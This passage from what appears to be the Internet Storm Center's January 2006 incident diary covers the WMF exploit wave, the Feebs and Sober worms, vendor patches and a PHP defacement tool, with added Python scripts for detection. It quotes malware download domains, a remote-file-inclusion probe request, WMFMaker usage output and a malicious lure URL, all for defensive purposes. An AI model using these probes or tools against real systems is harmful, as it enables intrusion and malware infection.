So download that latest greatest Java environment now if you haven't done so already and upgrade. Better yet: check those browser settings and turn Java off for all sites that you either do not trust 100% to execute code on your machines or that do not absolutely need it to work.

Swa Frantzen


Published: 2006-01-13


Friday the 13th, what do you believe?

If you believe the stories you might not want to leave the house today. Or was it about unplugging the Internet connection? I'm not superstitious, so I took on today as a handler. Now perhaps that was tempting fate, we'll see at the end of the day.

So let us know if today is your lucky or your unlucky day security wise. If anything interesting pops up we'll make a summary at the end of the day.

What I am interested in is if any of the businesses associated with our readers do take any measures due to the date.


Published: 2006-01-12

Windows XP Support Extended

Microsoft provides different levels of support for their products for varying periods of time depending on how they categorize the product.  For information about Microsoft's lifecycle support policies, go here

Most of the Windows XP family of operating systems (Home, Embedded, Media Center and Tablet) are considered to be consumer products.  As such, Microsoft provides mainstream support for 5 years after the product was released and self-help online support for 8+ years.

Mainstream support includes:

  • Incident support (no-charge incident support, paid incident support, support charged on an hourly basis, support for warranty claims)
  • Security update support
  • The ability to request non-security hotfixes

Self-help online support includes:

  • access to Microsoft's Knowledge Base articles
  • access to FAQs, troubleshooting tools and other resources
  • it does NOT include security update support

Windows XP Pro is considered Business class software.  As such, Microsoft provides mainstream support for 5 years after the product was released, extended support for an additional 5 years and self-help online support for 10+ years.

Mainstream support includes:
  • Incident support (no-charge incident support, paid incident support, support charged on an hourly basis, support for warranty claims)
  • Security update support
  • The ability to request non-security hotfixes

Extended support includes:

  • Paid support
  • Security update support at no additional cost
  • Non-security related hotfix support requires a separate Extended Hotfix Support contract to be purchased. Per-fix fees also apply.
  • Microsoft will not accept requests for warranty support, design changes, or new features during the Extended support phase.
  • Extended support is not available for Consumer, Hardware, Multimedia, and Business Solutions.

Self-help online support includes:

  • access to Microsoft's Knowledge Base articles
  • access to FAQs, troubleshooting tools and other resources
  • it does NOT include security update support

Extensions - Consumer

So for the consumer versions of Windows XP, mainstream support was going to end on December 31, 2006 and there was no guarantee of any security hot-fixes beyond that time.  Microsoft has now extended the mainstream support deadline for the consumer versions to an undefined date that is two years after the release of the follow-on operating system.

Extensions - Business

For the business grade Windows XP Pro, mainstream support was also going to end on December 31, 2006.  Extended support would have kicked in at that time and been provided until December 31, 2011.  If there were any security issues requiring a hotfix, these would have been provided at no cost.  One would have hoped that such hotfixes would have also been made available for the consumer versions of Windows XP as well.  Non-security related issues would only be patched if you were willing to pay for them.

Microsoft has now extended the mainstream support deadline for the business version to an undefined date that is two years after the release of the follow-on operating system and they have extended the extended support deadline to an undefined date that is seven years after the release of the follow-on operating system (thus five years beyond the end of mainstream support).

Published: 2006-01-12

Mozilla Thunderbird 1.5 Release

For anyone who has been running one of the Thunderbird 1.5 release candidates, the official 1.5 release of Thunderbird was made available today.  You can download it here


Published: 2006-01-11

New email virus making the rounds

We are currently analyzing a copy of .. something.  Attachment name "message.zip", detection by AV is still thin to nonexistent. When run, the code tries to pull additional files from web servers in Russia, so if you have a chance, you might consider blocking the following domains on your proxy / perimeter:

1gb.ru  /  t35.com  /  hzs.nm.ru /  users.cjb.net /  h16.ru

UPDATE 2200UTC:  message.zip contains a file named "Secure E-mail File.hta", which is according to current Virustotal output only detected by Panda and Kaspersky, the latter calls it Worm.Win32.Feebs.k . Samples we've seen come in an email with subject "Secure Message from HotMail.com user". The HTA file is nicely obfuscated, it has 2 obfuscation functions, one being easy unescape, while the other one is a bit more complex. Once it is executed by a user, it will run in the local zone, so it can use various ActiveXObjects. It will try to download executables from 5 web sites (domains listed above), all of which are up and working at this moment.
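A proxy-side check for those download sites, as an added example that is not code from the diary: the blocklist is the five domains listed above, matching is exact or by parent domain so that a host under 1gb.ru is caught while a look-alike merely ending in the same letters is not, and the proxy log lines are constructed (format assumed: timestamp, client, method, URL, status).

```python
from urllib.parse import urlsplit

# Added example, not ISC code. The domains named in the diary as download sites
# for the message.zip payload.
BLOCKED_DOMAINS = ["1gb.ru", "t35.com", "hzs.nm.ru", "users.cjb.net", "h16.ru"]


def normalise_host(host):
    """Lower-case, drop a trailing dot and any port, so 'Cdn.T35.COM.:80' matches 't35.com'."""
    host = host.strip().lower().rstrip(".")
    if host.startswith("["):          # bracketed IPv6 literal: leave untouched
        return host
    return host.split(":", 1)[0]


def blocked_by(host, blocklist=BLOCKED_DOMAINS):
    """Return the blocklist entry that covers this host (exact or parent domain), else None.

    The leading dot in the suffix test is what keeps 'notreallyh16.ru' from matching 'h16.ru'.
    """
    host = normalise_host(host)
    for entry in blocklist:
        entry = entry.lower()
        if host == entry or host.endswith("." + entry):
            return entry
    return None


def host_from_url(url):
    """Extract the host from a URL or from a bare 'host:port' as seen on CONNECT lines."""
    if "://" not in url:
        url = "http://" + url         # urlsplit needs a scheme to populate .hostname
    return urlsplit(url).hostname or ""


# Constructed proxy log lines (assumed format): timestamp client method URL status
SAMPLE_LOG = """\
1136988000.123 10.0.0.12 GET http://www.example.com/index.html 200
1136988001.456 10.0.0.12 GET http://user123.1gb.ru/feebs1.exe 200
1136988002.789 10.0.0.14 GET http://h16.ru/feebs2.exe 200
1136988003.001 10.0.0.15 GET http://notreallyh16.ru/ 200
1136988004.002 10.0.0.16 CONNECT hzs.nm.ru:443 200
"""


def scan_proxy_log(text, blocklist=BLOCKED_DOMAINS):
    """Return (client, host, matched_entry) for every request to a blocklisted domain."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        client, url = parts[1], parts[3]
        host = host_from_url(url)
        entry = blocked_by(host, blocklist)
        if entry:
            hits.append((client, host, entry))
    return hits


if __name__ == "__main__":
    for client, host, entry in scan_proxy_log(SAMPLE_LOG):
        print(f"{client} -> {host} (blocked by {entry})")
```

The same `blocked_by` test can sit in front of a DNS black hole or a proxy ACL; the clients it reports are the machines that already ran the HTA and are worth looking at regardless of whether the download succeeded.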

MD5 sums for the original exploit file and the two variants of EXEs it downloads when run:
7eb24b4c7b7933b6a0157e80be74383c  Secure E-mail File.hta
9cbd9710087bff6f372b1e3f652d8f7c  feebs1.exe
983bf330aae51535c7382dc82429364b  feebs2.exe

Analysis and write-up by fellow handler Bojan Zdrnja. Thanks! :)


Most of the AV vendors are now detecting this as another variant of the Feebs family. Here are links to a couple of descriptions:

Symantec (W32.Feebs.[D|E]@mm):

Trend Micro (JS_FEEBS.M):

F-Secure (Feebs):

Thanks to Juha-Matti and Danny Goodman  for sending information about this!


Published: 2006-01-11

Default Password in Cisco MARS

Cisco MARS (Cisco Security Monitoring Analysis and Response System) seems to contain an undocumented "make me root" command. If you are using CS-MARS, Cisco have just published an advisory.


Published: 2006-01-10

Quicktime patches for Mac and Windows

Is Apple hiding behind Microsoft's advisories?  Seems like Apple has been conveniently releasing security advisories on the same day as Microsoft's.  Conspiracy theory?  You be the judge.

Anyway, Apple released a security update to Quicktime.  http://docs.info.apple.com/article.html?artnum=303101  There are multiple vulnerabilities patched.  To summarize the advisory: A maliciously-crafted GIF/TIFF/TGA/QTIF image or multimedia file may result in arbitrary code execution.  Well that pretty much covers the whole web browsing thing. 

Given the week we've had, I suppose that everyone should go back to using netcat for surfing the web.


Published: 2006-01-10

Regularly scheduled MS updates

Microsoft has released two more security bulletins today.  They made no changes to the WMF bulletin from last week.  I'll be updating this throughout the day.

The first issue, MS06-002, is another client vulnerability that is triggered by browsing to a malicious web server.  You should probably treat this with the same severity as you treated the WMF issue from last week.  The eEye advisory gives some more details about the issue here: http://www.eeye.com/html/research/advisories/AD20060110.html.  It seems that malicious files may have .eot extensions and you may want to consider blocking those file types on web surfing, but the eEye advisory specifically states that the file extension could be anything.  Given the recent speed of Metasploit modules for new exploits, I would guess that a new module to create exploit files will soon be available.  Another point to note is that the data is compressed, so writing IDS/IPS signatures may be difficult.

The second issue, MS06-003, affects Outlook and Microsoft Exchange and it also looks fairly serious.  If you can't patch your Exchange servers immediately, read the "workarounds" section of the bulletin for information about blocking files that could be triggering this vulnerability.  It mentions the possibility of blocking email with an attachment name "Winmail.dat", however this will create other issues.  Read the entire "workarounds" section of the bulletin for the complete story.


Published: 2006-01-09

Another WMF attack vector?

We had hoped the chapter on WMF exploits had finally been closed, pending the patching of countless millions of vulnerable workstations of course.  However, today we were forwarded a Bugtraq disclosure of two additional functions vulnerable to memory corruption attack within the Microsoft graphics rendering engine.  The flaw reportedly affects the 'ExtCreateRegion' and 'ExtEscape' functions and while there has been no current proof of concept exploit/DoS code publicly released we will be watching this issue closely.

reference: http://www.securityfocus.com/bid/16167  (Sorry, you have to cut/paste).


Published: 2006-01-09

Probable php shell/web defacement tool usage on the rise

The ISC handler mailbox has received multiple reports of web site defacement attempts apparently using the "Defacing Tool 2.0 by r3v3ng4ns" suite of php based scripts intended to deface websites leveraging PHP remote file inclusion.  Multiple reports in a short period of time seem to indicate aggressive scanning activity leveraging this tool suite.  This particular attacker/tool combination has search engine hits going back to early December 2005, so the tool has been around for at the very least a short period of time.  The initially reported site hosting these php scripts has already removed the offending tools, but script hosting will always remain a moving target.

If you are running PHP enabled web servers, take a peek at your recent http logs for any hits similar to the following.  Clearly the common thread will be 'ref=' and 'cmd=' on the same http log entry.  It looks fairly trivial to create a snort signature to identify this scanning/abuse, considering that this is an edge case that the bleedingsnort rules do not yet alert on.  We'll probably post a usable snort signature later today.

GET /?ref=http://www.[removed]/[MultipleTargetFiles].dot?&cmd=

If you find unique hits on this abuse, feel free to report them back to us and we will make notification to the script hosting provider.
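As an added illustration (not part of this diary and not a Bleeding Snort rule), the following Python script applies the 'ref=' plus 'cmd=' check described above to a few constructed Apache access-log lines; the client addresses, timestamps and the files.example.net host are placeholders, and the script also notes whether the 'ref' value is a remote URL, which is what a remote file inclusion attempt would feed to include().

```python
import re
from urllib.parse import urlsplit, parse_qs

# NCSA common/combined log line: client ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def rfi_indicators(target):
    """Inspect one request target (path + query string).

    Returns a dict when the query carries both a 'ref' and a 'cmd' parameter
    (the calling convention of the defacement tool), otherwise None.
    'remote_include' is True when 'ref' is an absolute URL, i.e. the value a
    remote-file-inclusion attempt would hand to include()/require().
    """
    query = urlsplit(target).query
    params = parse_qs(query, keep_blank_values=True)   # keep 'cmd=' with an empty value
    if "ref" not in params or "cmd" not in params:
        return None
    ref = params["ref"][0]          # parse_qs already percent-decodes the value
    return {
        "ref": ref,
        "cmd": params["cmd"][0],
        "remote_include": ref.lower().startswith(REMOTE_SCHEMES),
    }


def scan_access_log(lines):
    """Return one record per log line that matches the tool's request pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue        # not a request line in the expected format; skip, don't fail
        ind = rfi_indicators(m.group("target"))
        if ind:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                **ind,
            })
    return hits


# Constructed sample log lines (not real traffic). Line 2 mirrors the shape of
# the probe quoted in the diary; line 3 is the same probe with the URL
# percent-encoded; line 4 has both parameters but a local 'ref' value.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jan/2006:10:12:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532',
    '198.51.100.7 - - [09/Jan/2006:10:13:44 +0000] '
    '"GET /?ref=http://files.example.net/tool.dot?&cmd= HTTP/1.0" 200 0',
    '198.51.100.7 - - [09/Jan/2006:10:13:45 +0000] '
    '"GET /forum/index.php?ref=http%3A%2F%2Ffiles.example.net%2Ftool.dot%3F&cmd=id HTTP/1.0" 404 211',
    '192.0.2.20 - - [09/Jan/2006:10:20:09 +0000] "GET /track.php?ref=/home&cmd=view HTTP/1.1" 200 99',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        flag = "REMOTE" if hit["remote_include"] else "local"
        print(f'{hit["ts"]} {hit["ip"]} {flag} ref={hit["ref"]!r} cmd={hit["cmd"]!r} status={hit["status"]}')
```

Only the entries flagged REMOTE carry a remote include attempt; the local one shows why a plain string match on 'ref=' and 'cmd=' needs a second look before reporting.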

If you manage a web host for which you are certain does not require the use of remote includes, you can disable that functionality in your php.ini configuration file by modifying the following variable.

allow_url_fopen = Off


Published: 2006-01-08

Handler Candy

And now for something completely different...

Given the ongoing WMF saga for the past two weeks,  here's some Sunday Brain Candy(TM) to help you readers relax and get ready for next week:

Podcast Candy
  • Rocketboom [Warning: we've had one user report that the page handled the quicktime plug-in oddly, and ended up crashing his Firefox browser.]

Visual Candy
Aural Candy

This is a quick ambient piece of mine that I hope you will sit back and enjoy.  On behalf of the Handlers, thanks for all the help and support during the WMF analysis.  (Released using the Creative Commons License, so no copyright issues here!)
Have a pleasant Sunday evening, everyone!

Dave Brookshire


Published: 2006-01-08

Apple AirPort Firmware Update

On Thursday, Apple released an update to their AirPort firmware that fixes a vulnerability (CVE-ID: CVE-2005-3714) that would allow an attacker to craft packets causing an AirPort Base Station to stop responding--therefore, denial of service.

Update is available from the "Software Update" pane in the System Preferences, or from Apple's Software Download site:


Information will also be posted to the Apple Product Security web site:



Published: 2006-01-08

Blue Coat WinProxy Vuln

Blue Coat Systems WinProxy Vulnerability, Patch and remote exploit announced.  Exploit code has been published and according to the iDefense Advisory "Exploitation .... is trivial" and "allows for the remote execution of arbitrary code by attackers."


"iDefense has confirmed this vulnerability in WinProxy 6.0. All previous versions are suspected to be vulnerable."

Patch - WinProxy 6.1a

Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-4085.


Published: 2006-01-08

2006, Week 1: A Look at the Numbers

The first week of the new year has been a pretty busy one for the Handlers, mostly surrounding the WMF issue.  At last count, 1740 e-mail messages have gone through the Handlers list, for an average of 247 messages per day.  Of those, the term "WMF" appeared in a subject line 989 times.  Of the total, there were 834 unique 'From' addresses.  I remember, when I first joined the Handlers, a busy day was in the neighborhood of 40 messages.  Whew.

Here's hoping the rest of 2006 smooths out a bit.

Dave Brookshire


Published: 2006-01-07

WMF: Status of Windows 98 and Windows ME?

We continue to receive questions from Windows 98 and Windows ME users concerning WMF.  To simplify reading (and writing) this diary, I will refer to these two versions of Windows as win9x.

Is there risk?

Win9x has the flawed gdi32.dll library. In the initial advisory, which is no longer online, Microsoft listed win9x in the company of all of the other vulnerable operating systems.

However, win9x is slightly different from the more recent Windows versions in the way it works. These differences are enough to prevent the current and publicly known exploits from working.  It does seem that Microsoft is confident that these differences are substantial enough to keep win9x-tailored WMF exploits from becoming available.

So to answer the question above, yes there is a risk. Win9x is most likely vulnerable but there is no clear and present threat (yet!).

Patch please?

We have been asked for a win9x patch or other foolproof solution for these systems. Unfortunately:
  • Microsoft has not released an official patch so far and there is none on the horizon either.
  • The Microsoft workaround (unregistering shimgvw.dll to prevent access to the vulnerable code in gdi32.dll) for other Windows versions cannot be performed in win9x.  The shimgvw.dll library file does not exist in win9x.
  • The unofficial patch which we endorsed in a very specific situation does not work on win9x. These older versions lack the technology needed for the patch to protect in-memory libraries from being accessed.
  • We know that several software coders have published or are going to publish patches for win9x systems.  However, we highly recommend that you make a risk decision based on your own situation as to whether you wait for a Microsoft patch.  We did the extraordinary thing of recommending an unofficial patch earlier for a very specific condition. The conditions for the win9x situation are simply not the same now. There is no clear and present threat and the defenses in the form of anti-virus programs have become significantly stronger.

What options are left?

If you find a no-user-interaction-required exploit of WMF files against win9x, send it to Microsoft (or alternatively send it to us, and we will disclose it responsibly to Microsoft).  This would be the last necessary requirement for Microsoft to build and release an official patch for win9x.

It may take a while for this "critical" exploit to surface and some of you want a solution now.  You are left with:
  • Accept the risk and play the wait and see game.
    • Possibly, try to mitigate the risk by getting a good anti-virus program in place, preferably one that is known to trigger on the exploits without triggering on the payload in the WMF. Make sure the signatures are always up to date.
    • Possibly, try to mitigate the risk by isolating the system. Isolating can be done on networks by air-gapping the machines, by removing floppy and cd-rom drives, by disabling USB ports, etc... Some systems might benefit enough from this to remain usable for a while longer.
  • Balance the risks of one of the unofficial patches.
    • I cannot recommend this action at this time, but it is an option you can evaluate, if you find it reduces your overall risk you might have a mitigation strategy.
  • Mitigate the risk by changing the OS
    • You might need to upgrade the hardware in order to be able to upgrade to a more recent version of Windows. (Remember: if you pass down the old hardware to your family, friends or a good cause, they now have the problem you had.)
    • The hardware capable of running win9x is mostly capable of running alternative operating systems such as Linux, OpenBSD, FreeBSD, and others.  So you have many choices from which to pick.
You could try to find a combination of the above that fits your specific situation or company policies.

We'd like to give you better alternatives, but currently we see none.

Swa Frantzen


Published: 2006-01-06

It is all about the risk.

In recent discussions with regard to the WMF vulnerability in Microsoft products there have been many different viewpoints, for example about whether or not to apply the unofficial patch or wait for one from the vendor. Now it is a somewhat moot point: Microsoft has released their official patch, and it works. Email feedback on our diary posts from the time of the discovery to the time of the MS advisory has been very strongly either for or against some of the stances taken by individual handlers and the Internet Storm Center as a whole. It varies from a hearty thank you to somewhat less than flattering.

In any case, what it comes down to is the risk to the individual or organization, and how that is managed. A home user may have no compunctions about going ahead and installing the unofficial patch. Or they may choose to wait for the officially sanctioned one, the ease of install and their level of computer knowledge will likely guide them. Corporate or Governmental organizations would have a completely different perspective. Installing a patch can be a major undertaking no matter the source, and their risk management practices would dictate how to proceed. Different organizations will have completely different approaches to determining their risk, and the appropriate actions to mitigate it. Acquiring, testing, and deploying either the official or unofficial patch (or other forms of mitigation) is a significant undertaking no matter the steps taken to arrive at the decision to do so. They may even choose to simply accept the risk and do nothing at all.

The Internet Storm Center is made up of a group of volunteers that have different backgrounds and perspectives on the overall risk of the WMF vulnerability, and the active exploitation seen. The group consensus was that the risk was high enough to warrant raising the Infocon level, and then testing and endorsing the unofficial patch. We are well aware that one size doesn't fit all. At the time it was the only mitigation technique that actually worked. Anti-virus, IDS/IPS do not give adequate protection against this attack and all of its vectors.

We collectively think Microsoft did the right thing in releasing the patch when they did, in advance of their regularly scheduled Tuesday. I think we can all agree that this is a serious issue, and that early patch release is a good thing.  

Many handlers worked long hours on this effort, as did Microsoft and others.

Adrien de Beaupré
ISC handler of the day.
Cinnabar Networks Inc.


Published: 2006-01-05

A Sober New Year's update.

Sober.Y will be attempting to update itself tonight at midnight. If you have the ability, you may wish to monitor traffic towards the sites listed below. The ISPs and hosting sites have known about this update for a while and I believe the malware has been removed from these sites, so I don't recommend blocking those sites. Monitoring them might provide you with a list of infected computers :)

From http://www.f-secure.com/v-descs/sober_y.shtml

Sober.Y monitors a fixed list of NTP servers to synchronize its time. If the date is 6.1.2006 or later, instead of mass mailing, it tries to download and execute a file from one of the following domains:



Published: 2006-01-05

Infocon back to green

Microsoft released an official patch early. I would like to thank all handlers who spent countless hours over the last few days (and the holiday weekend) analyzing the situation. We hope that the information we provided made the net a slightly safer place for you. Thanks to Microsoft for taking our input and we hope it contributed to the decision to publish this most important patch early.

For more details about installing the patch, and uninstalling the unofficial patch, see our prior diary.

johannes ullrich, jullrich@/sans.org
CTO Internet Storm Center.


Published: 2006-01-05

Technical document on WMF vulnerability and Guilfanov's patch available

I've written a technical document describing what is going on "behind-the-scenes" to cause the current WMF SETABORTPROC vulnerability and how Ilfak Guilfanov's patch worked to mitigate it.  Included are both annotations to the patch's source code and an annotated disassembly of the patch itself. 

Interestingly, reading Microsoft's description of their patch:

Specifically, the change introduced to address this vulnerability removes the support for the SETABORTPROC record type from the META_ESCAPE record in a WMF image. This update does not remove support for ABORTPROC functions registered by application SetAbortProc() API calls.

it appears that they ended up doing the same thing that Guilfanov's patch did (but where Guilfanov had to jump through .dll injection hoops, they could just change the source code and recompile GDI32.DLL...).

The document can be found here.
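As an added example, not code from this diary, from Guilfanov's patch or from Microsoft's update, here is a small Python scanner that walks the records of a WMF file and reports any META_ESCAPE record whose escape number is SETABORTPROC, i.e. the call that both patches neutralize; the record and escape constants come from the WMF format (META_ESCAPE = 0x0626, SETABORTPROC = 9), and the sample metafiles are constructed inline with dummy bytes in place of any escape payload.

```python
import struct

META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626        # record that forwards an Escape() call to GDI
SETABORTPROC = 9            # Escape() function number abused by the WMF exploits
PLACEABLE_KEY = 0x9AC6CDD7  # Aldus "placeable" header magic (22 bytes before the standard header)


def wmf_records(data):
    """Yield (function_code, parameter_bytes) for each record of a WMF blob.

    Raises ValueError on a truncated file or on a record whose declared size
    is impossible, so a malformed file never makes the loop run off the end."""
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22                                     # skip the placeable header
    if len(data) < off + 18:
        raise ValueError("truncated WMF header")
    header_words = struct.unpack_from("<H", data, off + 2)[0]
    if header_words != 9:
        raise ValueError("unexpected WMF header size: %d words" % header_words)
    off += header_words * 2
    while True:
        if off + 6 > len(data):
            raise ValueError("record header runs past end of file")
        size_words, func = struct.unpack_from("<IH", data, off)   # size (DWORD, in WORDs), function
        if size_words < 3:
            raise ValueError("record size %d words is smaller than its own header" % size_words)
        end = off + size_words * 2
        if end > len(data):
            raise ValueError("record claims %d words but the file ends first" % size_words)
        yield func, data[off + 6:end]
        if func == META_EOF:
            return
        off = end


def scan_wmf(data):
    """Return {'records', 'setabortproc_records', 'error'} for a WMF blob.

    Indices of META_ESCAPE records requesting SETABORTPROC are reported even
    when parsing later fails, so a deliberately truncated file still flags."""
    result = {"records": 0, "setabortproc_records": [], "error": None}
    try:
        for i, (func, params) in enumerate(wmf_records(data)):
            result["records"] += 1
            if func == META_ESCAPE and len(params) >= 2:
                escape_fn = struct.unpack_from("<H", params, 0)[0]   # first parameter word
                if escape_fn == SETABORTPROC:
                    result["setabortproc_records"].append(i)
    except ValueError as exc:
        result["error"] = str(exc)
    return result


# --- constructed sample metafiles (not real exploit files) -----------------

def _record(func, params=()):
    size_words = 3 + len(params)                    # size field + function code + parameters
    return struct.pack("<IH", size_words, func) + struct.pack("<%dH" % len(params), *params)


def _metafile(records):
    body = b"".join(records)
    size_words = 9 + len(body) // 2
    max_record = max(len(r) for r in records) // 2
    # Type=1 (memory), HeaderSize=9 words, Version=0x300, SizeLow, SizeHigh,
    # NumberOfObjects, MaxRecord (DWORD), NumberOfMembers
    header = struct.pack("<HHHHHHIH", 1, 9, 0x0300, size_words & 0xFFFF,
                         size_words >> 16, 0, max_record, 0)
    return header + body


BENIGN_WMF = _metafile([_record(META_SETMAPMODE, (8,)), _record(META_EOF)])
# Escape record: function number, byte count, then dummy 0x4141 data words
SUSPECT_WMF = _metafile([_record(META_SETMAPMODE, (8,)),
                         _record(META_ESCAPE, (SETABORTPROC, 4, 0x4141, 0x4141)),
                         _record(META_EOF)])
PLACEABLE_SUSPECT = struct.pack("<IHhhhhHIH", PLACEABLE_KEY, 0, 0, 0, 100, 100,
                                1440, 0, 0) + SUSPECT_WMF
TRUNCATED_SUSPECT = SUSPECT_WMF[:-4]                 # cut inside the EOF record

if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_WMF), ("suspect", SUSPECT_WMF),
                       ("placeable", PLACEABLE_SUSPECT), ("truncated", TRUNCATED_SUSPECT)]:
        print(name, scan_wmf(blob))
```

The scanner keys on the escape number rather than on any payload bytes, which is the difference the diary draws between a signature for the call and a signature for what a given exploit drops.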


Published: 2006-01-05

* Microsoft Patches Coming Today

Many of you already know this if you receive advance notification from Microsoft.  For everybody else, see their announcement about an early release of the WMF patch.  The patch and details about it are available here.  We'll provide more analysis once the patch is out and we've tested it. 


Published: 2006-01-05

WMF mitigation may cause printer problems.

We have received reports and researched an issue with Ilfak's patch AND/OR deregistering SHIMGVW.DLL causing printing issues.

De-registering SHIMGVW.DLL can cause printer issues. This has been verified.

Pedro, a fellow SANS handler, provided this:
"From Microsoft Windows Server 2003 Inside Out, by William R. Stanek: The client first uses the print driver to partially render the document into EMF and then spools the EMF file to the print server. The print server converts the EMF file to final form and then queues the file to the printer queue (printer)."

ScottF, another SANS handler, states "I have seen a few new printing bugs...basically the printer spooler tray icon pops up and says there is an error and then prints without a problem"; this was when SHIMGVW.DLL was deregistered.

It appears that Ilfak Guilfanov's patch can also cause printer problems.

Paul Shane reported:
"It seems that users printing with Lotus 1-2-3 V5 for Windows (yes...the old version), running on Windows XP, cannot print with the hexblog patch installed.  As soon as the patch is uninstalled and the machine is rebooted, printing works."

Finally, JimC, another SANS handler, writing about Ilfak's patch states:
"Actually, I guess this one doesn't surprise me too much.  The "legitimate" use of the SETABORTFUNC Escape() call in gdi32.dll is for printing. We have heard of a couple of other widely scattered situations where some sort of printing function was disrupted by the unofficial patch.


Published: 2006-01-04

What do the bad guys do with WMF?

With all this confusion about WMF files and various official and unofficial patches, you are probably wondering what the bad guys are doing with this.

We tracked quite a few exploits going around. Lately exploits started using Metasploit and we even received a standalone utility (the so-called WMFMaker, already described by Panda Software) that anyone can use:

$ ./wmfmaker

        Have fun

---- visit <REMOVED> -----
wmfmaker <file with payload>

No wonder that the bad guys started exploiting this more and more.

The main vector that the bad guys use to exploit this is still by posting it on web sites. The golden target would be a banner site or something that is visited frequently, but luckily, so far we haven't seen anything as widespread as that.

This doesn't mean that there are no exploits. One spam which was published by F-Secure (http://www.f-secure.com/weblog/archives/archive-012006.html#00000768) tried to get the user to follow a link about "Vandalism Over the New Year". The site in question is now gone, so this is not a problem anymore, but the typical scenario was: a WMF file which drops a downloader, which then subsequently downloads other trojans.
Besides this one, we also received various "Greeting Card" spams. Although the e-mail claimed that the greeting card is on 123greetings.com, the link actually pointed to http://mujeg orda.bita coras.com/REMOVED - this site is still active.

So what do all of these exploits actually drop? The answer is: typical "bad guys" stuff. They are usually dropping various versions of SDBot and similar IRC trojans. This will enable them to herd zombie machines that they use in the future.
One other exploit that we saw (thanks to Juha-Matti) dropped a pretty nasty password stealer/trojan, Trojan.Satiloler.B.

Finally, there was an interesting post by Andreas Marx on Bugtraq. Among various malware that the WMF files drop, they found one with a built-in counter on a "hidden" website. The counter seems to be going up fast - last year it was around 200.000 while today it is over a million. We can't be sure that the counter is correct, but we can be sure that the bad guys are on track with this vulnerability.

We have yet to see if other vectors will be exploited, but I'm afraid that this is more than enough for the bad guys to build a nice "army" of zombie machines.
So practice safe hex and patch/protect your machines as much as you can.


Published: 2006-01-04

Oldest infected .wmf?

We have a little project for all of the forensic treasure hunters out there.  As you all know, the .wmf issue came into public view about a week ago.  Since then, we've found that there are infected .wmf files with dates going back several weeks, so this little beauty has been around for a while.  What we are looking for are any confirmed intrusions earlier than the first of December 2005 that can be traced to this current vulnerability.  By confirmed, we mean that not only is the date of an infected .wmf file on a compromised system earlier than December 1st, but you can also prove that it was installed prior to December 1st and had some type of malicious payload embedded in it.  Tell us whatever you can share, and we'll summarize the details for others.  There's no prize for the earliest detect, but we are pretty sure that many would be interested in knowing how long this vulnerability has been actively exploited.


Published: 2006-01-04

Preparing for Battle

Are you ready to battle a large virus/worm outbreak?  Please don't view this as a prediction that there will be a large event, but let me just say that conditions are right for a big storm (WMF issue and the return of the Sober worm).

Regarding the WMF issue, you have probably decided to either wait for the official Microsoft patch, or you are rolling out Ilfak's patch.  But there is still about 6-10 days of risk here for a major worldwide event.  So here are some recommendations for preparing for the battle.  (This is primarily written for system and network admins...)

Prepare a short briefing for management on the situation:
1) There is a serious vulnerability in Microsoft operating systems.
2) An official patch will not be available from Microsoft until Jan. 10.
3) There are multiple propagation vectors: e-mail, instant messaging, web surfing, etc.
4) Several different versions of the exploit are in the wild and are being actively used by criminal groups.  All propagation methods are being used.  As of Wednesday, Jan 4 20:15:00 UTC, our current poll indicates that 22% of respondents (340) have seen exploit attempts through one of the exploitation vectors.
5) Tools to generate random files to exploit the vulnerability are publicly available.  These tools may be used to evade anti-virus and IDS/IPS signatures.
6) Anti-virus signatures and intrusion detection/prevention system signatures may only be able to catch the first generation of exploits.
7) If an outbreak does occur, how are you going to sanitize laptops that were infected outside of your network before allowing them to connect to your internal network?

As you provide this information, you should also provide an action plan for mitigating damage in the worst case scenario.  You should consider the following action items in your plan.  Also consider that your organization may have no internal infections, but that the rest of the Internet is having problems.  Solicit input from your management on the circumstances that would dictate each of the actions below.

1) Disconnect from the Internet.
2) Disconnect specific services from the Internet.  Talk with your network/firewall admins and have them be prepared to shut-off specific services (SMTP or HTTP) at strategic locations.
3) If you have multiple locations, consider the action plan of disconnecting internal WAN pipes to minimize damage to other parts of your organization.
4) Disconnect internal and/or external e-mail servers to prevent further
5) If you plan to perform any of the above actions, then you should also plan on how to bring these sites/services back online.
6) Determine an action plan for local workstation admins.  How are they going to receive virus updates and virus removal tools to clean

You should take this time to validate that you have good backups of your e-mail servers.  If things go really badly, you may be restoring from backup.  You should also make sure that everyone that could be involved in the incident response has an updated contact list (cell phones, pagers, home phones, etc) for all of the appropriate operational personnel.  Remember that some of these communication methods may fail during a virus outbreak.  Finally, you should identify secondary Internet access (maybe dial-up) to download virus updates, IDS/IPS updates, or get latest news about the event.

In a virus outbreak/worm event, communication between the operational folks and management is critical.  Make sure that there is a clear understanding of when/how to shut-off services and when/how to turn them back on.  Communication to end-users is also critical and you may want to start informing them now that the next 6-10 days could be very difficult times.

You can find much more information about incident response plans at the following sites:



Published: 2006-01-04

Ilfak Guilfanov's website, Hexblog.com back again

As you probably noticed, Ilfak Guilfanov's website, Hexblog.com, has been suspended. We presume that the main reason for this is bandwidth issues; we'll let you know if that's not the case (hopefully there were no evil intentions behind this).

In the mean time, if you need the unofficial patch, you can download it from our website. The link was posted in a previous story, here.


Ilfak's site is back, reduced to the bare minimum as it had very high load. If you still can't reach it, it's possible that there is some caching between you/your ISP/Ilfak's site.

Thanks to Alexander Hoff for pointing out that, due to changes on Ilfak's site, URLs from old diary entries don't work anymore. You can go to the main web page, http://www.hexblog.com to access Ilfak's files.

